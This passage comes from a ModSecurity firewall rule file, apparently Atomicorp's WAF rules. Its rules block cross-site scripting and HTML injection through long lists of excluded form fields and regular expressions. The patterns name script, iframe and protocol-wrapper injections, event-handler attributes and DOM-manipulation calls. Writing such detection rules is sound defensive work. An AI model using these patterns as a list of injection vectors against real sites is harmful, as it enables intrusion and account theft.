l|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:perch_39__blocks_4_youtubevideo|!ARGS:/^rwx97/|!ARGS:/infobox/|!ARGS:frdata|!ARGS:itdata  "(?:< ?/? ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome|qx?ss|embed)|< ?/?i?frame\b|< ?img src ?=|< ?base href ?=)"  "phase:2,deny,log,auditlog,status:403,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:340147,rev:163,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"

# Rule 340149:  XSS injection
SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|!ARGS:/^jms/|!ARGS:/^cont/|!ARGS:/_com_liferay/|!ARGS:/fbmcc/|!ARGS:/refuse_code/|!ARGS:/ide_/|!ARGS:/bsr_/|!ARGS:/^aftax/|!ARGS:emailMessage|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:pr_text|!ARGS:/introtext/|!ARGS:/^asteria/|!ARGS:/^dbem/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:agreement|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:actionfilter|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:payment_extrainfo|!ARGS:UserData|!ARGS:clone|!ARGS:areas|!ARGS:templatecode|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^data\[News\]/|!ARGS:d|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:ide_text|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:text1|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:tracking_code|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/desc/|!ARGS:/footer/|!ARGS:/embed/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:/signature/|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:text|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/infobox/  "(?:< ?i?frame ?src ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import |asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|event|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|window\.location|asfunction:_root\.launch)" "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,capture,id:340149,rev:162,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"

SecRule REQUEST_BODY "^< ?\??( |\+)?xml" "phase:2,id:333704,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"

#suspicious code
SecRule REQUEST_URI "(?:/admin/(?:[a-z]+/(?:save|module/update/|edit)|publish|\?op=edit|content/update|appearance/settings/|d/1/|pages/update|[a-z/]+/editform|block_edit)|/secure/roundcube/|/backend\.php/property/save|/edit/|/home/add|/\?act=edit|/site-content/|/project/update/|/index\.php\?option=com_?(?:easyblog|resource&controller=article|comprofiler&task=my_profile|aclassif)|/index\.php/datafeedmanager/adminhtml_datafeedmanager/save|/index\.php\?mode=(?:new|edit)story|^/filemanager/filemanager\.php|^/user_info/edit_profile/|/admin/editor/|^/user\.php\?op=edituser&htmltext=|^/admin/structure/|option=com_rsform&task=forms\.edit|^/ndxz-?studio/\?a=|^/support/agent|^/elements/save|^/settings/in_place_save/|^/ndxz2/|^/([a-z]+/)?index\.php/admin/s(?:ystem_config|ubject)/|^/(a-z)+/admin/programs/update_program|^/backoffice/\?op=edit|^/za/zcadm|^/efthuko\.php\?mod=editnews|^/mm-panel/index\.php|/ndxzstudio/|destination=admin/structure|/cms/db_manage\.php|^/mod_pagespeed|^/\?q=admin/appearance/settings|^/articles/(?:save|add|edit)|^/\?ptype=|/whmadmcp/addonmodules\.php|^/sh/file/|/multimediasave\.do|^/cms/|^/panel/index\.php|^/microagility/([a-z]+/)?useredit\.php|^/content_multigroup/|^/posts/edit|^/teksty/edytuj_akapit|^/egisportal/|/templatesavechanges|^/\?_task=mail|^/cpsess[0-9]+/scripts2?/|control_panel/manage\?p_p_id=com_liferay|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|^/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "phase:2,id:333732,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D1"


SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|!ARGS:allowedTags|!ARGS:compiled_css|!ARGS:/^addon/|!ARGS:/content/|!ARGS:fl_builder_data|!ARGS:/shortcode/|!ARGS:frdata|!ARGS:itdata|!ARGS:/document/|!ARGS:affiliatelinks|!ARGS:input_13\.2|!ARGS:prop_des|!ARGS:/footer/|!ARGS:/header/|!ARGS:/body/|!ARGS:/note/|!ARGS:input_65|!ARGS:/description/|!ARGS:con|!ARGS:/text/|!ARGS:/mail/|!ARGS:act|!ARGS:jfo|!ARGS:con|!ARGS:/html/|!ARGS:customized|!ARGS:/signature/|!ARGS:page_settings|!ARGS:/message/|XML:/* "@rx (?i)<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*(?:\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t|\W*?f\W*?o\W*?r\W*?m|\W*?s\W*?t\W*?y\W*?l\W*?e|\W*?s\W*?v\W*?g|\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e|(?:\W*?l\W*?i\W*?n\W*?k|\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t|\W*?e\W*?m\W*?b\W*?e\W*?d|\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t|\W*?p\W*?a\W*?r\W*?a\W*?m|\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e|\W*?b\W*?a\W*?s\W*?e|\W*?b\W*?o\W*?d\W*?y|\W*?m\W*?e\W*?t\W*?a|\W*?i\W*?m\W*?a?\W*?g\W*?e?|\W*?v\W*?i\W*?d\W*?e\W*?o|\W*?a\W*?u\W*?d\W*?i\W*?o|\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|\W*?s\W*?e\W*?t|\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e)[^>\w])|(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:formaction|style|background|src|lowsrc|ping|on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)?|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|m(?:o(?:z(?:pointerlock(?:change|error)|(?:orientation|time)change|fullscreen(?:change|error)|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|u(?:ccess|spend|bmit)|peech(?:start|end)|ound(?:start|end)|croll|how)|b(?:e(?:for(?:e(?:(?:scriptexecu|activa)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|deactivate)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ime(?:update|out)|ransitionend|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom))[\s\x08]*?=" "id:342259,rev:126,severity:2,phase:2,deny,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,msg:'Atomicorp.com WAF Rules: Possible HTML Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',log,auditlog"



SecRule ARGS|ARGS_NAMES|!ARGS:/rules/|!ARGS:dt|!ARGS:/^utm_/|!ARGS:/^ADVERT_/|!ARGS:actionRemarks|!ARGS:ad|!ARGS:/submenu/|!ARGS:/area_id/|!ARGS:/snippet/|!ARGS:accesshash|!ARGS:/motd/|ARGS:cont|!ARGS:/comenter/|!ARGS:/contenu/|!ARGS:/background/|!ARGS:styles|!ARGS:/^go/|!ARGS:raw|!ARGS:/sig/|!ARGS:/overlay/|!ARGS:/ads?code/|!ARGS:AUTOR01|!ARGS:third_party_code|!ARGS:/partial/|!ARGS:/adsense/|!ARGS:/bericht/|!ARGS:/mensaje/|!ARGS:whereOptions|!ARGS:/wyswie/|!ARGS:/what/|!ARGS:opis|!ARGS:dims|!ARGS:/cbPay/|!ARGS:/social/|!ARGS:/__dnn/|!ARGS:/^system/|!ARGS:/pfield/|!ARGS:/go_code/|!ARGS:/app_list/|!ARGS:/^epp/|!ARGS:/^akID/|!ARGS:/shortcode/|!ARGS:/custom/|!ARGS:head|!ARGS:/_mail_/|!ARGS:tpl|!ARGS:/object/|!ARGS:export|!ARGS:/introcopy/|!ARGS:cont|!ARGS:/geodir/|!ARGS:omesg|!ARGS:/terms/|!ARGS:/google/|!ARGS:/pass/|!ARGS:code|!ARGS:/^custom/|!ARGS:tele|!ARGS:/color/|!ARGS:/center/|!ARGS:/widget/|!ARGS:/theme/|!ARGS:/^value/|!ARGS:/itinerary/|!ARGS:repair|!ARGS:nw_brief|!ARGS:/definition/|!ARGS:/subject/|!ARGS:process|!ARGS:/daten/|!ARGS:/Beschreibung/|!ARGS:/desc/|!ARGS:/destination/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/included/|!ARGS:Lead|!ARGS:/training/|!ARGS:/Education/|!ARGS:/wp_autosave/|!ARGS:aname|!ARGS:datos|!ARGS:/^profile_/|!ARGS:return_to|!ARGS:ad|!ARGS:/overview/|!ARGS:/^mce_/|!ARGS:namestyle|!ARGS:/ULTIMATUM/|!ARGS:/agree/|!ARGS:/ARGS:uutinen/|!ARGS:tracklist|!ARGS:/artwork/|!ARGS:/gacode/|!ARGS:btnApply|!ARGS:/Button/|!ARGS:/^VALUE\[1\]$/|!ARGS:connectorPassword|!ARGS:sample|!ARGS:sotenson|!ARGS:/source_code/|!ARGS:/Settings/|!ARGS:code1|!ARGS:/promo/|!ARGS:view|!ARGS:record_json|!ARGS:/offer/|!ARGS:op|!ARGS:geweest|!ARGS:send|!ARGS:pressestimmen|!ARGS:name|!ARGS:imagemap|!ARGS:/^extra/|!ARGS:afbeelding|!ARGS:action_name|!ARGS:nieuwsbrief|!ARGS:/locatie/|!ARGS:ingredients|!ARGS:priceField|!ARGS:inhoud|!ARGS:f_main|!ARGS:error|!ARGS:komentar|!ARGS:uvod|!ARGS:/^field_/|!ARGS:customized|!ARGS:/fullnews/|!ARGS:vraag|!ARGS:/^textarea-video/|!ARGS:/_layout_/|!ARGS:/^FieldValue/|!ARGS:areacomum|!ARGS:lomake|!ARGS:vastaus|!ARGS:target|!ARGS:areaprivativa|!ARGS:areas|!ARGS:qti_data|!ARGS:templatecode|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/^help_/|!ARGS:quote|!ARGS:notice|!ARGS:userdata|!ARGS:source|!ARGS:/^book/|!ARGS:/leftcol/|!ARGS:mes|!ARGS:sisalto|!ARGS:reg_rules|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:json|!ARGS:wpreason|!ARGS:extended|!ARGS:/Kirjoitukset/|!ARGS:item_list|!ARGS:/x_line_item/|!ARGS:/^var_value/|!ARGS:valori|!ARGS:/rightcol/|!ARGS:/^instance/|!ARGS:/pimage/|!ARGS:/allowedTags/|!ARGS:/^zcck/|!ARGS:/includes/|!ARGS:/^button/|!ARGS:/accommodation/|!ARGS:/restaurant/|!ARGS:/^breves/|!ARGS:/testimonial/|!ARGS:feature|!ARGS:headstone|!ARGS:/formcode/|!ARGS:/log/|!ARGS:/metatags/|!ARGS:/^customfield/|!ARGS:/^fields/|!ARGS:/embed/|!ARGS:val333|!ARGS:/banner/|!ARGS:/synopsis/|!ARGS:cb_talks|!ARGS:log|!ARGS:/^bt_|!ARGS:/next/|!ARGS:changedept|!ARGS:receipt_address|!ARGS:narrative|!ARGS:/results/|!ARGS:/teaser/|!ARGS:EnTrar|!ARGS:cv|!ARGS:dati|!ARGS:/experience/|!ARGS:/plan/|!ARGS:do|!ARGS:properties|!ARGS:/para/|!ARGS:do|!ARGS:perex|!ARGS:/highlight/|!ARGS:/bio/|!ARGS:/short/|!ARGS:advanced|!ARGS:/contact/|!ARGS:/google_analytics/|!ARGS:review|!ARGS:rules|!ARGS:meta|!ARGS:/observacao/|!ARGS:/caption/|!ARGS:/feed/|!ARGS:/bbclosed/|!ARGS:logoutRequest|!ARGS:video1|!ARGS:/js_payload/|!ARGS:/abstract/|!ARGS:pc_main|!ARGS:/^property/|!ARGS:/notice/|!ARGS:/config/|!ARGS:/welcome/|!ARGS:des|!ARGS:pwd|!ARGS:structure|!ARGS:/tweet/|!ARGS:/table/|!ARGS:tag|!ARGS:ad_code|!ARGS:romancode|!ARGS:model|!ARGS:thecode|!ARGS:rqst|!ARGS:/^input_/|!ARGS:dhltrack|!ARGS:reflection|!ARGS:media|!ARGS:blurb|!ARGS:Thankyou|!ARGS:/OSDCS/|!ARGS:continue|!ARGS:do|!ARGS:waarde|!ARGS:img_alt|!ARGS:notes|!ARGS:drugs|!ARGS:/writing/|!ARGS:terms|!ARGS:/announ/|!ARGS:highlights|!ARGS:/^eeta-/|!ARGS:profile|!ARGS:/^prod/|!ARGS:/^News/|!ARGS:request|!ARGS:copy|!ARGS:/MapField/|!ARGS:/email/|!ARGS:main|!ARGS:/admin/|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:validatepromo|!ARGS:payment_sel|!ARGS:/title/|!ARGS:/submit/|!ARGS:contenu|!ARGS:/xjxargs/|!ARGS:block|!ARGS:btnCheckout|!ARGS:nav|!ARGS:/instructions/|!ARGS:/info/|!ARGS:recompose|!ARGS:compose|!ARGS:/^bname/|!ARGS:groupWelcomeScreen|!ARGS:langbericht|!ARGS:next|!ARGS:xsym_sym_brief|!ARGS:creategallery|!ARGS:/^copyright/|!ARGS:lease|!ARGS:livezillacode|!ARGS:cleaning|!ARGS:/^gui/|!ARGS:/Import_Cell/|!ARGS:/reply/|!ARGS:/^bbcode/|!ARGS:subhead|!ARGS:_cc|!ARGS:resume|!ARGS:addtoclass|!ARGS:/intro/|!ARGS:/answer/|!ARGS:registration_prices|!ARGS:registration_discounts|!ARGS:venue|!ARGS:/opportunit/|!ARGS:agenda|!ARGS:workshop|!ARGS:/^mainman/|!ARGS:features|!ARGS:/problem/|!ARGS:/question/|!ARGS:entry|!ARGS:/form/|!ARGS:/qualification/|!ARGS:/detail/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/script/|!ARGS:/^product/|!ARGS:/report/|!ARGS:/^room_/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:/^site_/|!ARGS:/translation/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:/embed/|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:/^_qf_/|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:/solution/|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:Post|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/_section_/|!ARGS:/css/|!ARGS:/^prop_/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/tagline/|!ARGS:/senior/|!ARGS:/^addon/ "(?:> ?< ?(?:img ?src|a ?href) ?= ?(?:ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<|> ?\"? ?(?:>|<)|< ?/?i?frame|^\"\>|\' ?\} ?\) ?;)"  "chain,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:replaceNulls,t:compressWhiteSpace,t:lowercase,id:350147,rev:168,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected'"
